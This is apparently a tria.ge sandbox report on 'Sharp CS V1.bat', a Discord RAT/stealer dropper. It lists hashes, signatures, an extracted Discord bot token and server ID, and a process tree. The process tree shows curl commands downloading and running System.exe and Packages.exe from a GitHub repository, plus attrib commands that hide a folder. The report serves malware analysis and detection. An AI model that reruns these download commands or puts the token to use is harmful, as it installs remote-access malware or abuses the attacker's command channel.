Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Sharp CS V1.bat

windows11-21h2-x64

Analysis

  • max time kernel
    213s
  • max time network
    215s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240611-en
  • resource tags

    arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29/06/2024, 10:53

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Sharp CS V1.bat

  • Size

    433B

  • MD5

    79f4dfedde066329feb0c23b9a95920d

  • SHA1

    470bd43b15f11f0583e5357c1f8223ed688559b0

  • SHA256

    5051740849cc567c88d930dbff64dbe995f400c68a2f8c25a38ccdd9f2b81359

  • SHA512

    a5270495d09ade0056166b26cfb25be796bbf41e96639f3c69011eb1f4433829426f99e0878fcb882e0ccae91e2023cdf01ffb0c5dd22a7ce0f58eb5a09ccd5d

Score
10/10
discordratdefense_evasionpersistenceratrootkitstealer

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTI0MzQwMDg0MDc3NDE2MDM4NQ.GC8XoW.GV37ZmiRqKTJrla6I_LG3ievGgv1WoBnOGAfMw

  • server_id

    1256556741160599562

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

    stealerrootkitratpersistencediscordrat
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
    defense_evasion
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sharp CS V1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3092
    • C:\Windows\system32\curl.exe
      curl -LJO https://github.com/LongYears9/tools/raw/master/System.exe
      2⤵
      • Drops file in Program Files directory
      PID:3148
    • C:\Windows\system32\curl.exe
      curl -LJO https://github.com/LongYears9/tools/raw/master/Packages.exe
      2⤵
      • Drops file in Program Files directory
      PID:4632
    • C:\Program Files\System64\Packages.exe
      "C:\Program Files\System64\Packages.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c mode con:cols=0120 lines=0030
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1136
        • C:\Windows\SysWOW64\mode.com
          mode con:cols=0120 lines=0030
          4⤵
            PID:2536
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c title Window Title
          3⤵
            PID:2660
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\myfiles" mkdir "C:\Users\Admin\AppData\Local\Temp\myfiles"
            3⤵
              PID:1780
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Admin\AppData\Local\Temp\wtmpd"
              3⤵
                PID:4712
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd
                3⤵
                • Hide Artifacts: Hidden Files and Directories
                • Suspicious use of WriteProcessMemory
                PID:3356
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +h C:\Users\Admin\AppData\Local\Temp\wtmpd
                  4⤵
                  • Views/modifies file attributes
                  PID:3128
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\i6.t
                3⤵
                  PID:4752
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\i6.bat
                  3⤵
                    PID:3876
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c
                    3⤵
                      PID:4792
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c pause
                      3⤵
                        PID:2784
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c
                        3⤵
                          PID:2064
                      • C:\Program Files\System64\System.exe
                        "C:\Program Files\System64\System.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1776
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                      1⤵
                        PID:4812
                      • C:\Windows\System32\oobe\UserOOBEBroker.exe
                        C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                        1⤵
                        • Drops file in Windows directory
                        PID:4712
                      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                        C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                        1⤵
                          PID:4900
                        • C:\Windows\system32\OpenWith.exe
                          C:\Windows\system32\OpenWith.exe -Embedding
                          1⤵
                          • Suspicious use of SetWindowsHookEx
                          PID:2688
                        • C:\Windows\system32\OpenWith.exe
                          C:\Windows\system32\OpenWith.exe -Embedding
                          1⤵
                          • Suspicious use of SetWindowsHookEx
                          PID:2880

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Program Files\System64\Packages.exe
                          Filesize

                          83KB

                          MD5

                          e155e62ecf5be9131dadecb19213a92a

                          SHA1

                          9ed3d1543b037e901c8870bd360bd5d65e15bda1

                          SHA256

                          70e2268a76050c6354ad22b0b997a41a48d7148219f6459acd44aadabe3bc500

                          SHA512

                          fdc30e0fc2d98b27a7fd145247373e5a38856cacaf6f6f66f2716175a4e2ced25f7383a1a42c2c8863a937a345362748575db4a65945e29c3f787975e1402959

                          Download Submit

                        • C:\Program Files\System64\System.exe
                          Filesize

                          78KB

                          MD5

                          3932b3da37a4b1ac396d52d624fd6c10

                          SHA1

                          92d9336e29373c317ab8c02005e6652f9515c63f

                          SHA256

                          d5b7c44ebd777e47a77ab3d8749b1c0de91c0c463cc525dd6fd57b7e9604ebab

                          SHA512

                          d0b43e227232b26032d15bc7430cfd90ef76629ee0064aa61c0585fe6465214801459a2108f5dc16d71dc5d0ee309d2afa28609d1a70f89d031437167b1c33c6

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\i6.bat
                          Filesize

                          173B

                          MD5

                          0f8f70e88009593eefaa155a8e31b1d6

                          SHA1

                          eabcc3f2135e0919e9456da0a4b1084f3382d4b6

                          SHA256

                          941c169c07670650fc6c6148c1cae068b69bac209e05010594e164aafc7cdf8b

                          SHA512

                          94df468b963f3c9d133a25e1ffa57039fac01fe960f0f738552ca6440e6242ff48d0b410fe70dd05a62e4842c925c9f2b0220ca9eb9cb4ff5490ada443c9a750

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\i6.t
                          Filesize

                          3B

                          MD5

                          a5ea0ad9260b1550a14cc58d2c39b03d

                          SHA1

                          f0aedf295071ed34ab8c6a7692223d22b6a19841

                          SHA256

                          f1b2f662800122bed0ff255693df89c4487fbdcf453d3524a42d4ec20c3d9c04

                          SHA512

                          7c735c613ece191801114785c1ee26a0485cbf1e8ee2c3b85ba1ad290ef75eec9fede5e1a5dc26d504701f3542e6b6457818f4c1d62448d0db40d5f35c357d74

                          Download Submit

                        • memory/1776-7-0x00007FFC003C3000-0x00007FFC003C5000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/1776-8-0x0000028167C60000-0x0000028167C78000-memory.dmp

                          Filesize

                          96KB

                          Download

                        • memory/1776-10-0x000002816A2E0000-0x000002816A4A2000-memory.dmp

                          Filesize

                          1.8MB

                          Download

                        • memory/1776-11-0x00007FFC003C0000-0x00007FFC00E82000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/1776-18-0x000002816B5B0000-0x000002816BAD8000-memory.dmp

                          Filesize

                          5.2MB

                          Download

                        • memory/1776-19-0x00007FFC003C0000-0x00007FFC00E82000-memory.dmp

                          Filesize

                          10.8MB

                          Download